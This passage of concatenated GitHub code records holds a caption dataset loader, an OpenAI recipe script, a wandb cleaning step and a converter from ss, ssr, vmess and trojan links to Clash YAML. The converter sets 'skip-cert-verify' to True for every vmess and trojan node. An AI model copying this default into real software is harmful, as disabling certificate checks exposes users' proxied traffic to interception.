item=img_hash_to_addr(self.dataset[index], self.img_addr, self.img_name_fmt)\r\n if is_train:\r\n imgs=image_transform(item[\"images\"], self.image_size)\r\n else:\r\n imgs=[Image.open(img).convert(\"RGB\") for img in item[\"images\"]]\r\n\r\n texts=pre_captions(item[\"comment\"], self.max_len)\r\n\r\n processed=self.preprocessor(images=imgs, \r\n text=texts if self.split!=\"test\" else None,\r\n padding=\"max_length\",\r\n max_length=min(512-self.pfx_len, self.max_len*3),\r\n return_tensors=\"pt\")\r\n \r\n if self.pretrain:\r\n neg_caps, neg_style_ids=self.__get_neg_example(item)\r\n processed_negs=self.preprocessor(images=None,\r\n text=neg_caps,\r\n padding=\"max_length\",\r\n max_length=min(512-self.pfx_len, self.max_len*3),\r\n return_tensors=\"pt\")\r\n\r\n processed[\"neg_input_ids\"]=processed_negs.pop(\"input_ids\")\r\n processed[\"neg_attention_mask\"]=processed_negs.pop(\"attention_mask\")\r\n processed[\"neg_prefix_ids\"]=self.pfx_ids[neg_style_ids,:]\r\n\r\n # insert style pfxs\r\n style_ids=list(map(lambda x:self.style_dict.get(x, self.n_cls-1), item[\"personality\"]))\r\n # print(style_ids)\r\n 
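# (Added note, hedged) self.pfx_ids was built above with torch.arange(n_cls*pfx_len)\r\n        # reshaped to [n_cls, pfx_len], i.e. one row of prefix-token ids per style; unknown\r\n        # personalities fall back to the last row (n_cls-1), so this row lookup is in range.\r\n        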
processed[\"prefix_ids\"]=self.pfx_ids[style_ids,:]\r\n\r\n \r\n processed={k:v.squeeze(0) for k,v in processed.items()}\r\n if not is_train:\r\n # squeeze the sequence\r\n texts=texts[0] if squeeze_list else texts\r\n processed.update({\"comment\": texts})\r\n\r\n # \"comment\" in output is like [(comment_0~(batch-1)[0],...),(comment_batch[1],...),...]\r\n # and we desire [(comment_0[0~4]), (comment_1[0~4])]\r\n # so remember to zip it\r\n return processed\r\n\r\n def __get_neg_example(self, item):\r\n # select one negative cap from negative caps\r\n neg_caps=[random.choice(x) for x in item[\"negative_caps\"]]\r\n neg_caps=pre_captions(neg_caps, self.max_len)\r\n # sample a different style for each item\r\n gts_styles=[self.style_dict.get(x, self.n_cls-1) for x in item[\"personality\"]]\r\n neg_style_ids=[]\r\n for item in gts_styles:\r\n while True:\r\n neg_item=random.randint(0, self.n_cls-2)\r\n if neg_item != item:\r\n neg_style_ids.append(neg_item)\r\n break\r\n \r\n return neg_caps, neg_style_ids\r\n \r\n def __len__(self):\r\n return len(self.dataset)\r\n\r\ndef build_pcap_dataset(config, preprocessor, device=\"cpu\", split=\"train\", slice:str=\"\"):\r\n '''\r\n load PCap dataset\r\n\r\n args:\r\n - config: ConCap.config\r\n - preprocessor, device\r\n - split: must be one of [\"train\", \"test\", \"(e)val\"]\r\n - slice: str with format of \"[a:b]\"\r\n \r\n '''\r\n print(\"\\n-------dataset loading-------\")\r\n split=split.lower()\r\n if split==\"eval\":\r\n split=\"val\"\r\n if split not in [\"pretrain\", \"train\", \"test\", \"val\"]:\r\n raise KeyError(\"dataset split must be [\\\"train\\\", \\\"test\\\", \\\"(e)val\\\"]\")\r\n \r\n copy_keys=[\"prefix_len\", \"n_cls\", \"max_len\"]\r\n pretrain=(split==\"pretrain\")\r\n # load dataset conf\r\n ds_conf={\r\n **config[\"dataset\"],\r\n **{k: config[\"text_model\"][k] for k in copy_keys},\r\n \"image_size\": config[\"vision_model\"].get(\"image_size\", 384),\r\n \"split\": \"train\" if pretrain else split\r\n }\r\n \r\n ds_file=osp.join(ds_conf[\"dataset_path\"],ds_conf[\"{}_json\".format(ds_conf[\"split\"])])\r\n dataset=load_dataset(\"json\", data_files=ds_file, split=\"train{}\".format(slice))\r\n # we need config.\r\n tgt_dataset=Personality_Captions(dataset, preprocessor, config=ds_conf, pretrain=pretrain)\r\n \r\n print(\"\\nLoad {} split from {}\".format(split, ds_file))\r\n if slice != \"\":\r\n print(\"Slice: {}\".format(slice))\r\n print(\"Length: {}\".format(len(tgt_dataset)))\r\n print(\"-------dataset load done-------\")\r\n\r\n return tgt_dataset\r\n\r\n\r\n\r\n","repo_name":"wdr-RA02/Controllable_Cap_new","sub_path":"data/pcap_dataset.py","file_name":"pcap_dataset.py","file_ext":"py","file_size_in_byte":6303,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"28680017586","text":"'''\nAdam Forestier\nJune 21, 2023\nTakes in ingredients and returns recipe and image of recipe\n'''\n\nimport openai\nimport re\nimport requests\nimport shutil\n\nfrom key import key as openai_key\n\nopenai.api_key = openai_key\n\ndef create_dish_prompt(ingredients: list) -> str:\n '''\n arguments: list of ingredents\n returns: prompt to send to \n descriptioN: create_dish_prompt creates prompt to send to api based on recipe list\n '''\n prompt = f\"Create a detailed recipe based only on only the following ingredients. Here is the list of ingredents: {', '.join(ingredients)}. 
Additionally, assign a title starting with 'Recipe Title: ' to this recipe.\"\n return prompt\n\ndef extract_recipe_title(recipe: str) -> str:\n '''\n arguments: recipe text\n returns: the name of the recipe\n description: extract_recipe_title returns the title of the dish\n '''\n title = re.findall(\"^.*Recipe Title: .*$\", recipe, re.MULTILINE)[0].strip().split(\"Recipe Title: \")[1]\n return title\n\ndef save_img(img_response, file_name) -> int:\n '''\n arguments: response from api\n returns: status code\n description: save_img downloads the image that api has created\n '''\n img_url = img_response['data'][0]['url']\n img_results = requests.get(img_url, stream=True)\n if img_results.status_code == 200:\n with open(file_name, 'wb') as f:\n shutil.copyfileobj(img_results.raw, f)\n else:\n print('ERROR LOADING IMAGE')\n return img_results.status_code\n\ni = ['ground turkey', 'zucchini', 'tomatoes', 'rice']\n\nresponse = openai.Completion.create(\n model='text-davinci-003',\n prompt=create_dish_prompt(ingredients=i),\n max_tokens=512,\n temperature=.7\n)\n\n# The recipe\nrecipe_text = response['choices'][0]['text']\nprint(recipe_text)\n\n# get recipe title to generate photo\nrecipe_title = extract_recipe_title(recipe=recipe_text)\n\n# Create image\nimg_response = openai.Image.create(\n prompt=recipe_title,\n n=1,\n size='256x256'\n)\n\n# Save image\nsave_img(img_response=img_response, file_name='recipe_photo.png')","repo_name":"atfb10/OpenAI-API-Course","sub_path":"course/recipe_creator/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2060,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"42732165941","text":"#!/usr/bin/env python\n\nimport logging\nimport pandas as pd\nimport wandb\nimport os\nimport hydra\nfrom omegaconf import DictConfig\n\n\nlogging.basicConfig(level=logging.INFO, format=\"%(asctime)-15s %(message)s\")\nlogger = logging.getLogger()\n\n\n@hydra.main(config_name='config')\ndef go(config: DictConfig):\n\n wandb.login(key=config['wandb']['api_key'])\n run = wandb.init(project=config['wandb']['project'], job_type=config['wandb']['job_type'])\n\n logger.info(\"Reading artifact\")\n df = pd.read_parquet(config['artifact']['path'])\n\n # Drop the duplicates\n logger.info(\"Dropping duplicates\")\n df = df.drop_duplicates().reset_index(drop=True)\n\n logger.info(\"Fixing missing values\")\n # These are missing values that are due to an old version of the data. 
On new data,\n # because of a change in the web form used to register new songs, the title and the\n # song name are already empty strings\n df['title'].fillna(value='', inplace=True)\n df['song_name'].fillna(value='', inplace=True)\n df['text_feature'] = df['title'] + ' ' + df['song_name']\n\n filename = \"processed_data.csv\"\n df.to_csv(filename)\n\n artifact = wandb.Artifact(\n name=config['artifact']['name'],\n type=config['artifact']['type'],\n description=config['artifact']['description'],\n )\n artifact.add_file(filename)\n\n logger.info(\"Logging artifact\")\n run.log_artifact(artifact)\n\n os.remove(filename)\n\n\nif __name__ == \"__main__\":\n go()\n","repo_name":"AndreaCaliandro/mlops","sub_path":"lesson-2-data-exploration-and-preparation/exercises/exercise_5/starter/run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":1470,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"12736215519","text":"#!/usr/bin/env python3\n\nimport re, yaml, json, base64\nimport requests, socket, urllib.parse\nfrom requests.adapters import HTTPAdapter\n\nimport geoip2.database\n\nclass convert():\n\n def main(raw_input, input_type='url', output_type='url', custom_set={'dup_rm_enabled': False, 'format_name_enabled': False}): # {'input_type': ['url', 'content'],'output_type': ['url', 'YAML', 'Base64']}\n \"\"\"Convert subscribe content to YAML or Base64 or url.\n 首先获取到订阅内容,然后对其进行格式化处理。如果内容不是 “订阅内容解析错误”,在进行去重、改名操作后(可选)输出目标格式,否则输出 “订阅内容解析错误”。\n \"\"\"\n if input_type == 'url': # 获取 URL 订阅链接内容\n sub_content = ''\n if isinstance(raw_input, list):\n a_content = []\n for url in raw_input:\n s = requests.Session()\n s.mount('http://', HTTPAdapter(max_retries=5))\n s.mount('https://', HTTPAdapter(max_retries=5))\n try:\n print('Downloading from:' + url)\n resp = s.get(url, timeout=5)\n s_content = convert.yaml_decode(convert.format(resp.content.decode('utf-8')))\n a_content.append(s_content)\n except Exception as err:\n print(err)\n return 'Url 解析错误'\n sub_content = convert.format(''.join(a_content))\n else:\n s = requests.Session()\n s.mount('http://', HTTPAdapter(max_retries=5))\n s.mount('https://', HTTPAdapter(max_retries=5))\n try:\n print('Downloading from:' + raw_input)\n resp = s.get(raw_input, timeout=5)\n sub_content = convert.format(resp.content.decode('utf-8'))\n except Exception as err:\n print(err)\n return 'Url 解析错误'\n elif input_type == 'content': # 解析订阅内容\n sub_content = convert.format(raw_input)\n\n if sub_content != '订阅内容解析错误':\n dup_rm_enabled = custom_set['dup_rm_enabled']\n format_name_enabled = custom_set['format_name_enabled']\n final_content = convert.makeup(sub_content,dup_rm_enabled,format_name_enabled)\n if output_type == 'YAML':\n return final_content\n elif output_type == 'Base64':\n return convert.base64_encode(convert.yaml_decode(final_content))\n elif output_type == 'url':\n return convert.yaml_decode(final_content)\n else:\n print('Please define right output type.')\n return '订阅内容解析错误'\n else:\n return '订阅内容解析错误'\n\n def format(sub_content,output=False): # 对链接文本(Base64, url, YAML)进行格式化处理, 输出节点的配置字典(Clash 配置), output 为真是输出 YAML 文本\n if '' not in sub_content:\n if 'proxies:' not in sub_content: # 对 URL 内容进行格式化处理\n url_list = []\n try:\n if '://' not in sub_content:\n sub_content = convert.base64_decode(sub_content)\n\n raw_url_list = re.split(r'\\n+', sub_content)\n\n for url in raw_url_list:\n while len(re.split('ss://|ssr://|vmess://|trojan://|vless://', url)) > 2:\n url_to_split = url[8:]\n if 'ss://' in 
url_to_split and 'vmess://' not in url_to_split and 'vless://' not in url_to_split:\n url_splited = url_to_split.replace('ss://', '\\nss://', 1) # https://www.runoob.com/python/att-string-replace.html\n elif 'ssr://' in url_to_split:\n url_splited = url_to_split.replace('ssr://', '\\nssr://', 1)\n elif 'vmess://' in url_to_split:\n url_splited = url_to_split.replace('vmess://', '\\nvmess://', 1)\n elif 'trojan://' in url_to_split:\n url_splited = url_to_split.replace('trojan://', '\\ntrojan://', 1)\n elif 'vless://' in url_to_split:\n url_splited = url_to_split.replace('vless://', '\\nvless://', 1)\n url_split = url_splited.split('\\n')\n\n front_url = url[:8] + url_split[0]\n url_list.append(front_url)\n url = url_split[1]\n\n url_list.append(url)\n\n url_content = '\\n'.join(url_list)\n return convert.yaml_encode(url_content,output=False)\n except:\n print('Sub_content 格式错误')\n return '订阅内容解析错误'\n\n elif 'proxies:' in sub_content: # 对 Clash 内容进行格式化处理\n try:\n try_load = yaml.safe_load(sub_content)\n if output:\n raise ValueError\n else:\n content_yaml_dic = try_load\n for item in content_yaml_dic['proxies']:# 对转换过程中出现的不标准配置格式转换\n try:\n if item['type'] == 'vmess' and 'HOST' in item['ws-headers'].keys():\n item['ws-headers']['Host'] = item['ws-headers'].pop(\"HOST\")\n except KeyError:\n if '.' not in item['server']:\n content_yaml_dic['proxies'].remove(item)\n pass\n return content_yaml_dic # 返回字典, output 值为 True 时返回修饰过的 YAML 文本\n except Exception:\n try:\n sub_content = sub_content.replace('\\'', '').replace('\"', '')\n url_list = []\n il_chars = ['|', '?', '[', ']', '@', '!', '%', ':']\n lines = re.split(r'\\n+', sub_content)\n line_fix_list = []\n for line in lines:\n value_list = re.split(r': |, ', line)\n if len(value_list) > 6:\n value_list_fix = []\n for value in value_list:\n for char in il_chars:\n value_il = False\n if char in value:\n value_il = True\n break\n if value_il == True and ('{' not in value and '}' not in value):\n value = '\"' + value + '\"'\n value_list_fix.append(value)\n elif value_il == True and '}' in value:\n if '}}' in value:\n host_part = value.replace('}}','')\n host_value = '\"'+host_part+'\"}}'\n value_list_fix.append(host_value)\n elif '}}' not in value:\n host_part = value.replace('}','')\n host_value = '\"'+host_part+'\"}'\n value_list_fix.append(host_value)\n else:\n value_list_fix.append(value)\n line_fix = line\n for index in range(len(value_list_fix)):\n line_fix = line_fix.replace(value_list[index], value_list_fix[index])\n line_fix_list.append(line_fix)\n elif len(value_list) == 2:\n value_list_fix = []\n for value in value_list:\n for char in il_chars:\n value_il = False\n if char in value:\n value_il = True\n break\n if value_il == True:\n value = '\"' + value + '\"'\n value_list_fix.append(value)\n line_fix = line\n for index in range(len(value_list_fix)):\n line_fix = line_fix.replace(value_list[index], value_list_fix[index])\n line_fix_list.append(line_fix)\n elif len(value_list) == 1:\n if ':' in line:\n line_fix_list.append(line)\n else:\n line_fix_list.append(line)\n\n sub_content = '\\n'.join(line_fix_list).replace('False', 'false').replace('True', 'true')\n if output:\n return sub_content\n else:\n content_yaml_dic = yaml.safe_load(sub_content)\n for item in content_yaml_dic['proxies']:# 对转换过程中出现的不标准配置格式转换\n try:\n if item['type'] == 'vmess' and 'HOST' in item['ws-headers'].keys():\n item['ws-headers']['Host'] = item['ws-headers'].pop(\"HOST\")\n except KeyError:\n if '.' 
not in item['server']:\n content_yaml_dic['proxies'].remove(item)\n pass\n\n return content_yaml_dic # 返回字典, output 值为 True 时返回修饰过的 YAML 文本\n except:\n print('Sub_content 格式错误')\n return '订阅内容解析错误'\n else:\n print('订阅内容解析错误')\n return '订阅内容解析错误'\n \n def makeup(input, dup_rm_enabled=False, format_name_enabled=False): # 输入节点配置字典, 对节点进行区域的筛选和重命名,输出 YAML 文本 \n # 区域判断(Clash YAML): https://blog.csdn.net/CSDN_duomaomao/article/details/89712826 (ip-api)\n if isinstance(input, dict):\n sub_content = input\n else:\n sub_content = convert.format(input)\n proxies_list = sub_content['proxies']\n \n if dup_rm_enabled: # 去重\n begin = 0\n raw_length = len(proxies_list)\n length = len(proxies_list)\n while begin < length:\n if (begin + 1) == 1:\n print(f'\\n-----去重开始-----\\n起始数量{length}')\n elif (begin + 1) % 100 == 0:\n print(f'当前基准{begin + 1}-----当前数量{length}')\n elif (begin + 1) == length and (begin + 1) % 100 != 0:\n repetition = raw_length - length\n print(f'当前基准{begin + 1}-----当前数量{length}\\n重复数量{repetition}\\n-----去重完成-----\\n')\n proxy_compared = proxies_list[begin]\n\n begin_2 = begin + 1\n while begin_2 <= (length - 1):\n\n if proxy_compared['server'] == proxies_list[begin_2]['server'] and proxy_compared['port'] == proxies_list[begin_2]['port']:\n proxies_list.pop(begin_2)\n length -= 1\n begin_2 += 1\n begin += 1\n\n url_list = []\n\n for proxy in proxies_list: # 改名\n if format_name_enabled:\n emoji = {\n 'AD': '🇦🇩', 'AE': '🇦🇪', 'AF': '🇦🇫', 'AG': '🇦🇬', \n 'AI': '🇦🇮', 'AL': '🇦🇱', 'AM': '🇦🇲', 'AO': '🇦🇴', \n 'AQ': '🇦🇶', 'AR': '🇦🇷', 'AS': '🇦🇸', 'AT': '🇦🇹', \n 'AU': '🇦🇺', 'AW': '🇦🇼', 'AX': '🇦🇽', 'AZ': '🇦🇿', \n 'BA': '🇧🇦', 'BB': '🇧🇧', 'BD': '🇧🇩', 'BE': '🇧🇪', \n 'BF': '🇧🇫', 'BG': '🇧🇬', 'BH': '🇧🇭', 'BI': '🇧🇮', \n 'BJ': '🇧🇯', 'BL': '🇧🇱', 'BM': '🇧🇲', 'BN': '🇧🇳', \n 'BO': '🇧🇴', 'BQ': '🇧🇶', 'BR': '🇧🇷', 'BS': '🇧🇸', \n 'BT': '🇧🇹', 'BV': '🇧🇻', 'BW': '🇧🇼', 'BY': '🇧🇾', \n 'BZ': '🇧🇿', 'CA': '🇨🇦', 'CC': '🇨🇨', 'CD': '🇨🇩', \n 'CF': '🇨🇫', 'CG': '🇨🇬', 'CH': '🇨🇭', 'CI': '🇨🇮', \n 'CK': '🇨🇰', 'CL': '🇨🇱', 'CM': '🇨🇲', 'CN': '🇨🇳', \n 'CO': '🇨🇴', 'CR': '🇨🇷', 'CU': '🇨🇺', 'CV': '🇨🇻', \n 'CW': '🇨🇼', 'CX': '🇨🇽', 'CY': '🇨🇾', 'CZ': '🇨🇿', \n 'DE': '🇩🇪', 'DJ': '🇩🇯', 'DK': '🇩🇰', 'DM': '🇩🇲', \n 'DO': '🇩🇴', 'DZ': '🇩🇿', 'EC': '🇪🇨', 'EE': '🇪🇪', \n 'EG': '🇪🇬', 'EH': '🇪🇭', 'ER': '🇪🇷', 'ES': '🇪🇸', \n 'ET': '🇪🇹', 'EU': '🇪🇺', 'FI': '🇫🇮', 'FJ': '🇫🇯', \n 'FK': '🇫🇰', 'FM': '🇫🇲', 'FO': '🇫🇴', 'FR': '🇫🇷', \n 'GA': '🇬🇦', 'GB': '🇬🇧', 'GD': '🇬🇩', 'GE': '🇬🇪', \n 'GF': '🇬🇫', 'GG': '🇬🇬', 'GH': '🇬🇭', 'GI': '🇬🇮', \n 'GL': '🇬🇱', 'GM': '🇬🇲', 'GN': '🇬🇳', 'GP': '🇬🇵', \n 'GQ': '🇬🇶', 'GR': '🇬🇷', 'GS': '🇬🇸', 'GT': '🇬🇹', \n 'GU': '🇬🇺', 'GW': '🇬🇼', 'GY': '🇬🇾', 'HK': '🇭🇰', \n 'HM': '🇭🇲', 'HN': '🇭🇳', 'HR': '🇭🇷', 'HT': '🇭🇹', \n 'HU': '🇭🇺', 'ID': '🇮🇩', 'IE': '🇮🇪', 'IL': '🇮🇱', \n 'IM': '🇮🇲', 'IN': '🇮🇳', 'IO': '🇮🇴', 'IQ': '🇮🇶', \n 'IR': '🇮🇷', 'IS': '🇮🇸', 'IT': '🇮🇹', 'JE': '🇯🇪', \n 'JM': '🇯🇲', 'JO': '🇯🇴', 'JP': '🇯🇵', 'KE': '🇰🇪', \n 'KG': '🇰🇬', 'KH': '🇰🇭', 'KI': '🇰🇮', 'KM': '🇰🇲', \n 'KN': '🇰🇳', 'KP': '🇰🇵', 'KR': '🇰🇷', 'KW': '🇰🇼', \n 'KY': '🇰🇾', 'KZ': '🇰🇿', 'LA': '🇱🇦', 'LB': '🇱🇧', \n 'LC': '🇱🇨', 'LI': '🇱🇮', 'LK': '🇱🇰', 'LR': '🇱🇷', \n 'LS': '🇱🇸', 'LT': '🇱🇹', 'LU': '🇱🇺', 'LV': '🇱🇻', \n 'LY': '🇱🇾', 'MA': '🇲🇦', 'MC': '🇲🇨', 'MD': '🇲🇩', \n 'ME': '🇲🇪', 'MF': '🇲🇫', 'MG': '🇲🇬', 'MH': '🇲🇭', \n 'MK': '🇲🇰', 'ML': '🇲🇱', 'MM': '🇲🇲', 'MN': '🇲🇳', \n 'MO': '🇲🇴', 'MP': '🇲🇵', 'MQ': '🇲🇶', 'MR': '🇲🇷', \n 'MS': '🇲🇸', 'MT': '🇲🇹', 'MU': '🇲🇺', 'MV': '🇲🇻', \n 'MW': '🇲🇼', 'MX': '🇲🇽', 'MY': '🇲🇾', 'MZ': '🇲🇿', \n 'NA': '🇳🇦', 'NC': '🇳🇨', 'NE': '🇳🇪', 'NF': '🇳🇫', \n 'NG': '🇳🇬', 'NI': '🇳🇮', 'NL': '🇳🇱', 
'NO': '🇳🇴', \n 'NP': '🇳🇵', 'NR': '🇳🇷', 'NU': '🇳🇺', 'NZ': '🇳🇿', \n 'OM': '🇴🇲', 'PA': '🇵🇦', 'PE': '🇵🇪', 'PF': '🇵🇫', \n 'PG': '🇵🇬', 'PH': '🇵🇭', 'PK': '🇵🇰', 'PL': '🇵🇱', \n 'PM': '🇵🇲', 'PN': '🇵🇳', 'PR': '🇵🇷', 'PS': '🇵🇸', \n 'PT': '🇵🇹', 'PW': '🇵🇼', 'PY': '🇵🇾', 'QA': '🇶🇦', \n 'RE': '🇷🇪', 'RO': '🇷🇴', 'RS': '🇷🇸', 'RU': '🇷🇺', \n 'RW': '🇷🇼', 'SA': '🇸🇦', 'SB': '🇸🇧', 'SC': '🇸🇨', \n 'SD': '🇸🇩', 'SE': '🇸🇪', 'SG': '🇸🇬', 'SH': '🇸🇭', \n 'SI': '🇸🇮', 'SJ': '🇸🇯', 'SK': '🇸🇰', 'SL': '🇸🇱', \n 'SM': '🇸🇲', 'SN': '🇸🇳', 'SO': '🇸🇴', 'SR': '🇸🇷', \n 'SS': '🇸🇸', 'ST': '🇸🇹', 'SV': '🇸🇻', 'SX': '🇸🇽', \n 'SY': '🇸🇾', 'SZ': '🇸🇿', 'TC': '🇹🇨', 'TD': '🇹🇩', \n 'TF': '🇹🇫', 'TG': '🇹🇬', 'TH': '🇹🇭', 'TJ': '🇹🇯', \n 'TK': '🇹🇰', 'TL': '🇹🇱', 'TM': '🇹🇲', 'TN': '🇹🇳', \n 'TO': '🇹🇴', 'TR': '🇹🇷', 'TT': '🇹🇹', 'TV': '🇹🇻', \n 'TW': '🇹🇼', 'TZ': '🇹🇿', 'UA': '🇺🇦', 'UG': '🇺🇬', \n 'UM': '🇺🇲', 'US': '🇺🇸', 'UY': '🇺🇾', 'UZ': '🇺🇿', \n 'VA': '🇻🇦', 'VC': '🇻🇨', 'VE': '🇻🇪', 'VG': '🇻🇬', \n 'VI': '🇻🇮', 'VN': '🇻🇳', 'VU': '🇻🇺', 'WF': '🇼🇫', \n 'WS': '🇼🇸', 'XK': '🇽🇰', 'YE': '🇾🇪', 'YT': '🇾🇹', \n 'ZA': '🇿🇦', 'ZM': '🇿🇲', 'ZW': '🇿🇼', \n 'RELAY': '🏁',\n 'NOWHERE': '🇦🇶',\n }\n\n server = proxy['server']\n if server.replace('.','').isdigit():\n ip = server\n else:\n try:\n ip = socket.gethostbyname(server) # https://cloud.tencent.com/developer/article/1569841\n except Exception:\n ip = server\n\n with geoip2.database.Reader('./utils/Country.mmdb') as ip_reader:\n try:\n response = ip_reader.country(ip)\n country_code = response.country.iso_code\n except Exception:\n ip = '0.0.0.0'\n country_code = 'NOWHERE'\n\n if country_code == 'CLOUDFLARE':\n country_code = 'RELAY'\n elif country_code == 'PRIVATE':\n country_code = 'RELAY'\n\n if country_code in emoji:\n name_emoji = emoji[country_code]\n else:\n name_emoji = emoji['NOWHERE']\n\n proxy_index = proxies_list.index(proxy)\n if len(proxies_list) >= 999:\n proxy['name'] = f'{name_emoji}{country_code}-{ip}-{proxy_index:0>4d}'\n elif len(proxies_list) <= 999 and len(proxies_list) > 99:\n proxy['name'] = f'{name_emoji}{country_code}-{ip}-{proxy_index:0>3d}'\n elif len(proxies_list) <= 99:\n proxy['name'] = f'{name_emoji}{country_code}-{ip}-{proxy_index:0>2d}'\n\n if proxy['server'] != '127.0.0.1':\n proxy_str = str(proxy)\n url_list.append(proxy_str)\n elif format_name_enabled == False:\n if proxy['server'] != '127.0.0.1': # 防止加入无用节点\n proxy_str = str(proxy)\n url_list.append(proxy_str)\n\n yaml_content_dic = {'proxies': url_list}\n yaml_content_raw = yaml.dump(yaml_content_dic, default_flow_style=False, sort_keys=False, allow_unicode=True, width=750, indent=2) # yaml.dump 显示中文方法 https://blog.csdn.net/weixin_41548578/article/details/90651464 yaml.dump 各种参数 https://blog.csdn.net/swinfans/article/details/88770119\n yaml_content = convert.format(yaml_content_raw,output=True)\n \n return yaml_content # 输出 YAML 格式文本\n\n def yaml_encode(url_content,output=True): # 将 URL 内容转换为 YAML 文本, output 为 False 时输出节点配置字典\n url_list = []\n\n lines = re.split(r'\\n+', url_content)\n\n for line in lines:\n yaml_url = {}\n if 'vmess://' in line:\n try:\n vmess_json_config = json.loads(convert.base64_decode(line.replace('vmess://', '')))\n vmess_default_config = {\n 'v': 'Vmess Node', 'ps': 'Vmess Node', 'add': '0.0.0.0', 'port': 0, 'id': '',\n 'aid': 0, 'scy': 'auto', 'net': '', 'type': '', 'host': vmess_json_config['add'], 'path': '/', 'tls': ''\n }\n vmess_default_config.update(vmess_json_config)\n vmess_config = vmess_default_config\n\n yaml_url = {}\n #yaml_config_str = ['name', 'server', 'port', 'type', 'uuid', 'alterId', 'cipher', 'tls', 
'skip-cert-verify', 'network', 'ws-path', 'ws-headers']\n #vmess_config_str = ['ps', 'add', 'port', 'id', 'aid', 'scy', 'tls', 'net', 'host', 'path']\n # 生成 yaml 节点字典\n if vmess_config['id'] == '' or vmess_config['id'] is None:\n print('节点格式错误')\n else:\n yaml_url.setdefault('name', urllib.parse.unquote(str(vmess_config['ps'])))\n yaml_url.setdefault('server', vmess_config['add'])\n yaml_url.setdefault('port', int(vmess_config['port']))\n yaml_url.setdefault('type', 'vmess')\n yaml_url.setdefault('uuid', vmess_config['id'])\n yaml_url.setdefault('alterId', int(vmess_config['aid']))\n yaml_url.setdefault('cipher', vmess_config['scy'])\n yaml_url.setdefault('skip-cert-verify', True)\n if vmess_config['net'] == '' or vmess_config['net'] is False or vmess_config['net'] is None:\n yaml_url.setdefault('network', 'tcp')\n else:\n yaml_url.setdefault('network', vmess_config['net'])\n if vmess_config['path'] == '' or vmess_config['path'] is False or vmess_config['path'] is None:\n yaml_url.setdefault('ws-path', '/')\n else:\n yaml_url.setdefault('ws-path', vmess_config['path'])\n if vmess_config['net'] == 'h2' or vmess_config['net'] == 'grpc':\n yaml_url.setdefault('tls', True)\n elif vmess_config['tls'] == '' or vmess_config['tls'] is False or vmess_config['tls'] is None:\n yaml_url.setdefault('tls', False)\n else:\n yaml_url.setdefault('tls', True)\n if vmess_config['host'] == '':\n yaml_url.setdefault('ws-headers', {'Host': vmess_config['add']})\n else:\n yaml_url.setdefault('ws-headers', {'Host': vmess_config['host']})\n\n url_list.append(yaml_url)\n except Exception as err:\n print(f'yaml_encode 解析 vmess 节点发生错误: {err}')\n pass\n\n if 'ss://' in line and 'vless://' not in line and 'vmess://' not in line:\n if '#' not in line:\n line = line + '#SS%20Node'\n try:\n ss_content = line.replace('ss://', '')\n part_list = ss_content.split('#', 1) # https://www.runoob.com/python/att-string-split.html\n yaml_url.setdefault('name', urllib.parse.unquote(part_list[1]))\n if '@' in part_list[0]:\n mix_part = part_list[0].split('@', 1)\n method_part = convert.base64_decode(mix_part[0])\n server_part = f'{method_part}@{mix_part[1]}'\n else:\n server_part = convert.base64_decode(part_list[0])\n\n server_part_list = server_part.split(':', 1) # 使用多个分隔符 https://blog.csdn.net/shidamowang/article/details/80254476 https://zhuanlan.zhihu.com/p/92287240\n method_part = server_part_list[0]\n server_part_list = server_part_list[1].rsplit('@', 1)\n password_part = server_part_list[0]\n server_part_list = server_part_list[1].split(':', 1)\n\n yaml_url.setdefault('server', server_part_list[0])\n yaml_url.setdefault('port', server_part_list[1])\n yaml_url.setdefault('type', 'ss')\n yaml_url.setdefault('cipher', method_part)\n yaml_url.setdefault('password', password_part)\n\n url_list.append(yaml_url)\n except Exception as err:\n print(f'yaml_encode 解析 ss 节点发生错误: {err}')\n pass\n\n if 'ssr://' in line:\n try:\n ssr_content = convert.base64_decode(line.replace('ssr://', ''))\n \n parts = re.split(':', ssr_content)\n if len(parts) != 6:\n print('SSR 格式错误: %s' % ssr_content)\n password_and_params = parts[5]\n password_and_params = re.split('/\\?', password_and_params)\n password_encode_str = password_and_params[0]\n params = password_and_params[1]\n\n param_parts = re.split('\\&', params)\n param_dic = {}\n for part in param_parts:\n key_and_value = re.split('\\=', part)\n param_dic[key_and_value[0]] = key_and_value[1]\n yaml_url.setdefault('name', convert.base64_decode(param_dic['remarks']))\n yaml_url.setdefault('server', 
parts[0])\n yaml_url.setdefault('port', parts[1])\n yaml_url.setdefault('type', 'ssr')\n yaml_url.setdefault('cipher', parts[3])\n yaml_url.setdefault('password', convert.base64_decode(password_encode_str))\n yaml_url.setdefault('obfs', parts[4])\n yaml_url.setdefault('protocol', parts[2])\n yaml_url.setdefault('obfsparam', convert.base64_decode(param_dic['obfsparam']))\n yaml_url.setdefault('protoparam', convert.base64_decode(param_dic['protoparam']))\n yaml_url.setdefault('group', convert.base64_decode(param_dic['group']))\n\n url_list.append(yaml_url)\n except Exception as err:\n print(f'yaml_encode 解析 ssr 节点发生错误: {err}')\n pass\n\n if 'trojan://' in line:\n try:\n url_content = line.replace('trojan://', '')\n part_list = re.split('#', url_content, maxsplit=1) # https://www.runoob.com/python/att-string-split.html\n yaml_url.setdefault('name', urllib.parse.unquote(part_list[1]))\n\n server_part = part_list[0].replace('trojan://', '')\n server_part_list = re.split(':|@|\\?|&', server_part) # 使用多个分隔符 https://blog.csdn.net/shidamowang/article/details/80254476 https://zhuanlan.zhihu.com/p/92287240\n yaml_url.setdefault('server', server_part_list[1])\n yaml_url.setdefault('port', server_part_list[2])\n yaml_url.setdefault('type', 'trojan')\n yaml_url.setdefault('password', server_part_list[0])\n server_part_list = server_part_list[3:]\n\n for config in server_part_list:\n if 'sni=' in config:\n yaml_url.setdefault('sni', config[4:])\n elif 'allowInsecure=' in config or 'tls=' in config:\n if config[-1] == 0:\n yaml_url.setdefault('tls', False)\n elif 'type=' in config:\n if config[5:] != 'tcp':\n yaml_url.setdefault('network', config[5:])\n elif 'path=' in config:\n yaml_url.setdefault('ws-path', config[5:])\n elif 'security=' in config:\n if config[9:] != 'tls':\n yaml_url.setdefault('tls', False)\n\n yaml_url.setdefault('skip-cert-verify', True)\n\n url_list.append(yaml_url)\n except Exception as err:\n 